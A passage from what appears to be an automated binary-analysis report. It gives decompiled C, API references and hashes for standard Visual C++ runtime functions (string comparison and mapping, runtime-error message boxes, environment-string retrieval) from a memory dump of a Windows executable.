0x0040398e
0x00403991
0x00403991
0x00403991
0x00403993
0x00403997
0x0040399c
0x0040399c
0x004039c7
0x004039c7
0x004039c7
0x004039c9
0x004039cc
0x004039ce
0x004039ce
0x004039d2
0x004039d4
0x00000000
0x004039d4
0x00403736
0x00000000
0x00403746
0x0040374c
0x00403750
0x00403753
0x00403757
0x00403758
0x00403758
0x00403761
0x00403766
0x00403794
0x00403798
0x0040379a
0x004037a1
0x004037a1
0x004037a3
0x004037a5
0x004037a8
0x004037a8
0x004037a8
0x004037a8
0x00403768
0x00403772
0x00403776
0x00403778
0x0040377c
0x0040377e
0x00403783
0x00403783
0x0040377e
0x00403766
0x004037b1
0x004037ba
0x004037c2
0x004037c9
0x00403879
0x004037cf
0x004037d8
0x004037d9
0x004037e0
0x004037e4
0x004037e4
0x004037e8
0x004037eb
0x004037f1
0x004037f4
0x004037f7
0x004037fa
0x00403800
0x00403809
0x0040380b
0x00403812
0x00403815
0x00403817
0x0040381b
0x0040383e
0x00403842
0x00403844
0x0040384e
0x00403851
0x00403851
0x00403851
0x00403851
0x00403854
0x0040385b
0x0040385b
0x0040385e
0x0040381d
0x00403821
0x0040382f
0x0040382f
0x00403831
0x00403835
0x0040383a
0x0040383a
0x00403865
0x00403865
0x00403867
0x0040386a
0x0040386d
0x00403871
0x00403873
0x00403873
0x0040387c
0x0040387f
0x00403882
0x00000000
0x00403882

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: c295135d24096637811d9c2337524a1fe8b3cd46574432ef6835662b29470685
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: AEB19F7590020ADFDB15CF04C5D0AA9BBE5BF48319F14C1AED85A6B382C775EE46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004054D8, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004054D8(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t86;
				int _t87;
				int _t88;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;
				int _t118;

				_push(0xffffffff);
				_push(0x40c510);
				_push(E00402C1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t118 =  *0x40f244; // 0x1
				_t107 = 1;
				if(_t118 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E00405175(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E00405175(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x40f244; // 0x1
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_t86 =  *0x40f234; // 0x0
								_a28 = _t86;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E00405450(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E00405450(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					if(CompareStringW(0, 0, 0x40c4e0, _t107, 0x40c4e0, _t107) == 0) {
						if(CompareStringA(0, 0, 0x40c4dc, _t107, 0x40c4dc, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x40f244 = 2;
							goto L5;
						}
					} else {
						 *0x40f244 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}

0x004054db
0x004054dd
0x004054e2
0x004054ed
0x004054ee
0x004054f5
0x004054fb
0x00405500
0x00405508
0x00405509
0x0040554b
0x0040554b
0x00405550
0x00405556
0x0040555c
0x0040555d
0x0040555f
0x0040555f
0x00405565
0x0040556d
0x00405573
0x00405574
0x00405574
0x00405577
0x0040557f
0x0040559e
0x00000000
0x004055a4
0x004055a7
0x004055a9
0x004055ae
0x004055ae
0x004055b3
0x004055c1
0x004055ce
0x004055d9
0x0040561c
0x0040561c
0x00000000
0x004055db
0x004055ea
0x00000000
0x004055f0
0x004055f2
0x00405623
0x00000000
0x00405625
0x00405629
0x0040562b
0x00405631
0x00405633
0x00405633
0x00405638
0x00000000
0x00000000
0x0040563d
0x00405641
0x0040564c
0x0040564f
0x00000000
0x00405651
0x00000000
0x00405651
0x00000000
0x00000000
0x00000000
0x00000000
0x00405641
0x00405633
0x00405631
0x00000000
0x00405629
0x004055f4
0x004055f8
0x004055fa
0x00405600
0x00405602
0x00405602
0x00405607
0x00000000
0x00000000
0x0040560c
0x00405610
0x00405617
0x0040561a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405610
0x00405602
0x00405600
0x00000000
0x00000000
0x004055f8
0x004055f2
0x004055ea
0x004055d0
0x004055d0
0x004055d0
0x004055d0
0x004055c3
0x004055c3
0x004055c3
0x004055c5
0x004055c5
0x004055c5
0x00405656
0x00405656
0x00405661
0x00405667
0x0040566c
0x00000000
0x00405672
0x00405672
0x0040567c
0x00405681
0x00405686
0x00405689
0x004056a8
0x00000000
0x004056c8
0x004056d7
0x004056d9
0x004056de
0x00000000
0x004056e0
0x004056e0
0x004056eb
0x004056f0
0x004056f3
0x004056f5
0x004056f8
0x00405712
0x00000000
0x0040572b
0x00405739
0x00405739
0x00405712
0x004056de
0x004056a8
0x0040566c
0x004055b3
0x00405581
0x00405591
0x00405591
0x0040550b
0x0040551e
0x0040553b
0x00405741
0x00405741
0x00405541
0x00405541
0x00000000
0x00405541
0x00405520
0x00405520
0x00000000
0x00405520
0x0040551e
0x00405743
0x00405749
0x00405754
0x00000000

APIs

CompareStringW.KERNEL32(00000000,00000000,0040C4E0,00000001,0040C4E0,00000001,00000000,021E0DFC,y"@,00403D52,0040C49C,?,00401586,?,?), ref: 00405516
CompareStringA.KERNEL32(00000000,00000000,0040C4DC,00000001,0040C4DC,00000001,?,?,?,00403D23), ref: 00405533
CompareStringA.KERNEL32(?,00000000,00000000,00403D23,?,?,00000000,021E0DFC,y"@,00403D52,0040C49C,?,00401586,?,?), ref: 00405591
GetCPInfo.KERNEL32(?,00000000,00000000,021E0DFC,y"@,00403D52,0040C49C,?,00401586,?,?,?,00403D23), ref: 004055E2
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00403D23), ref: 00405661
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,00403D23), ref: 004056C2
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00403D23), ref: 004056D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00403D23), ref: 00405721
CompareStringW.KERNEL32(?,00000000,00000000,?,?,00000000,?,00000000,?,?,?,00403D23), ref: 00405739

Strings

y"@, xrefs: 004054F8

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID: y"@
API String ID: 1651298574-1963953533
Opcode ID: 4522a8fca8d205522b01c716d56f82fddf23face70227aaf1810cc473165d52c
Instruction ID: 64077d62b81770f9466f9ece0f6ef909a0dbed39fe67c8930b3d644aed8a7e46
Opcode Fuzzy Hash: 4522a8fca8d205522b01c716d56f82fddf23face70227aaf1810cc473165d52c
Instruction Fuzzy Hash: 3271AC72900649EFCF21AF909D85AAF7BBAEB05314F54453BF814B22A0D33A8C51DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004048FB, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004048FB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x40f210 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x40f214; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x40f218; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x40f210(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x40f210 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x40f214 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x40f218 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x004048fc
0x004048fe
0x00404906
0x0040494a
0x0040494a
0x00404951
0x00404955
0x00404959
0x0040495b
0x00404962
0x00404967
0x00404967
0x00404962
0x00404959
0x00000000
0x00404976
0x00404913
0x00404917
0x00404980
0x00000000
0x00404980
0x00404925
0x00404929
0x0040492e
0x00000000
0x00404930
0x0040493e
0x00404945
0x00000000
0x00404945

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00402E51,?,Microsoft Visual C++ Runtime Library,00012010,?,0040C3D0,?,0040C420,?,?,?,Runtime Error!Program: ), ref: 0040490D
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404925
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404936
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404943

Strings

user32.dll, xrefs: 00404908
GetActiveWindow, xrefs: 00404930
GetLastActivePopup, xrefs: 00404938
MessageBoxA, xrefs: 0040491F

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 7660c35066901c8b22d0a15799295ddefbfb27f64e0380932bcac06821da38e8
Instruction ID: d0049415656ce7088efeacb3ade41c1249395eadcb7b4190fdc513b817ec3f49
Opcode Fuzzy Hash: 7660c35066901c8b22d0a15799295ddefbfb27f64e0380932bcac06821da38e8
Instruction Fuzzy Hash: 340171F5740201EBC720DFF4ADC0A2B7AA8BAD8750304053FE605F22A1D77988448BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00404F51, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00404F51(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x40c4e8);
				_push(E00402C1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x40f23c; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E00405175(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x40f23c; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x40f234; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00405450(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00405450(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x40c4e0, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x40c4dc, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x40f23c = 2;
							goto L5;
						}
					} else {
						 *0x40f23c = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x00404f54
0x00404f56
0x00404f5b
0x00404f66
0x00404f67
0x00404f6e
0x00404f74
0x00404f79
0x00404f7f
0x00404fc7
0x00404fca
0x00404fd2
0x00404fd8
0x00404fd9
0x00404fd9
0x00404fdc
0x00404fe4
0x00405006
0x00000000
0x0040500c
0x0040500f
0x00405011
0x00405016
0x00405016
0x00405026
0x00405036
0x00405038
0x0040503d
0x00000000
0x00405043
0x00405043
0x0040504e
0x00405053
0x00405058
0x0040505b
0x00405077
0x00000000
0x00405092
0x004050a4
0x004050a6
0x004050ab
0x00000000
0x004050ad
0x004050b1
0x004050f3
0x00405102
0x00405107
0x0040510a
0x0040510c
0x0040510f
0x00405129
0x00000000
0x00405143
0x00405146
0x00405147
0x00405148
0x0040514e
0x00405151
0x0040514a
0x0040514a
0x0040514b
0x0040514b
0x00405164
0x00405168
0x00000000
0x00000000
0x00000000
0x00000000
0x00405168
0x004050b3
0x004050b6
0x0040516e
0x0040516e
0x00000000
0x00000000
0x00000000
0x004050b6
0x004050b1
0x004050ab
0x00405077
0x0040503d
0x00404fe6
0x00404ff8
0x00404ff8
0x00404f81
0x00404f81
0x00404f82
0x00404f85
0x00404f9b
0x00404fb7
0x004050df
0x004050df
0x00404fbd
0x00404fbd
0x00000000
0x00404fbd
0x00404f9d
0x00404f9d
0x00000000
0x00404f9d
0x00404f9b
0x004050e7
0x004050f2

APIs

LCMapStringW.KERNEL32(00000000,00000100,0040C4E0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00404F93
LCMapStringA.KERNEL32(00000000,00000100,0040C4DC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00404FAF
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00404FF8
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00405030
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405088
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040509E
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 004050D1
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00405139

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 696fe65bb9386ef5f9ccdf1a43ec4f43b2276b3a0d0d473b334e928d736c83d7
Instruction ID: ca06851699864d42034aed133bf317a385eb530bc385482dce832c18da39d289
Opcode Fuzzy Hash: 696fe65bb9386ef5f9ccdf1a43ec4f43b2276b3a0d0d473b334e928d736c83d7
Instruction Fuzzy Hash: AE518B71900609EBCF219F94DD85AAF7BB5FB48714F20423AF915B11A0C33A8D51DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2D, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402D2D(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x40e2a8;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x40e338) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x40e2a8; // 0xd0000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x40efa0; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x40e1f8 == 1) {
						_t16 = _t54 + 0x40e2ac; // 0x40c3d0
						_t56 = _t16;
						_t19 = E00404880( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00404790( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00404880( &_v424) + 1 > 0x3c) {
								_t49 = E00404880( &_v424) +  &_v424 - 0x3b;
								E00404990(E00404880( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00404790( &_v164, "Runtime Error!\n\nProgram: ");
							E004047A0( &_v164, _t49);
							E004047A0( &_v164, "\n\n");
							_t12 = _t54 + 0x40e2ac; // 0x40c3d0
							E004047A0( &_v164,  *_t12);
							_t17 = E004048FB( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x00402d2d
0x00402d36
0x00402d39
0x00402d3b
0x00402d40
0x00402d44
0x00402d47
0x00402d4d
0x00000000
0x00000000
0x00000000
0x00402d4d
0x00402d52
0x00402d55
0x00402d5b
0x00402d61
0x00402d69
0x00402e5a
0x00402e5a
0x00402e65
0x00402e77
0x00402d80
0x00402d86
0x00402da2
0x00402db0
0x00402db6
0x00402dbd
0x00402dbf
0x00402dcf
0x00402dea
0x00402df2
0x00402df7
0x00402df7
0x00402e06
0x00402e13
0x00402e24
0x00402e29
0x00402e36
0x00402e4c
0x00402e54
0x00402d86
0x00402d69
0x00402e7f

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00402D9A
GetStdHandle.KERNEL32(000000F4,0040C3D0,00000000,?,00000000,00000000), ref: 00402E70
WriteFile.KERNEL32(00000000), ref: 00402E77

Strings

Runtime Error!Program: , xrefs: 00402E00
..., xrefs: 00402DEC
Microsoft Visual C++ Runtime Library, xrefs: 00402E46
<program name unknown>, xrefs: 00402DAA

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: fbcbf6d225daa4541b0da9f5e07f00778773a72f49cba976c33b9b631ffeaa3a
Instruction ID: 8757269cf10206d02fd3e43ea8ce3b2602b98dff3374cb1026c014f078c6ffc9
Opcode Fuzzy Hash: fbcbf6d225daa4541b0da9f5e07f00778773a72f49cba976c33b9b631ffeaa3a
Instruction Fuzzy Hash: 30310872600218AFDF24E761DD8AFAA736CEF85304F10097BF544F61C0D7BCA9548A59

Uniqueness

Uniqueness Score: -1.00%

Function 00402808, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402808() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x40f114; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00401F8B(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E004039E0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00401F8B(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004022F7(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x40f114 = 2;
					goto L18;
				}
				 *0x40f114 = 1;
				goto L6;
			}

0x0040280a
0x00402819
0x0040281b
0x0040281d
0x00402821
0x00402859
0x004028e3
0x00402931
0x00000000
0x00402931
0x004028e5
0x004028e7
0x004028f5
0x004028f7
0x004028f9
0x00402905
0x00402908
0x00402910
0x00402915
0x0040291e
0x00402917
0x00402917
0x00402917
0x00402927
0x00000000
0x00000000
0x00000000
0x00000000
0x004028fb
0x004028fb
0x004028fb
0x004028fb
0x004028fc
0x00402900
0x00402901
0x00000000
0x004028fb
0x004028ef
0x004028f3
0x00000000
0x00000000
0x00000000
0x004028f3
0x0040285f
0x00402861
0x0040286f
0x00402872
0x00402874
0x00402884
0x00402890
0x00402897
0x0040289d
0x004028a1
0x004028a4
0x004028ac
0x004028b0
0x004028c1
0x004028c7
0x004028cd
0x004028cd
0x004028d1
0x004028d1
0x004028b0
0x004028d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00402876
0x00402876
0x00402876
0x00402877
0x00402878
0x0040287e
0x0040287f
0x00000000
0x00402876
0x00402865
0x00402869
0x00000000
0x00000000
0x00000000
0x00402869
0x00402825
0x00402829
0x0040283d
0x00402841
0x00000000
0x00000000
0x00402847
0x00000000
0x00402847
0x0040282b
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 00402823
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 00402837
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 00402863
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401C85), ref: 0040289B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401C85), ref: 004028BD
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401C85), ref: 004028D6
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401C85), ref: 004028E9
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402927

Memory Dump Source

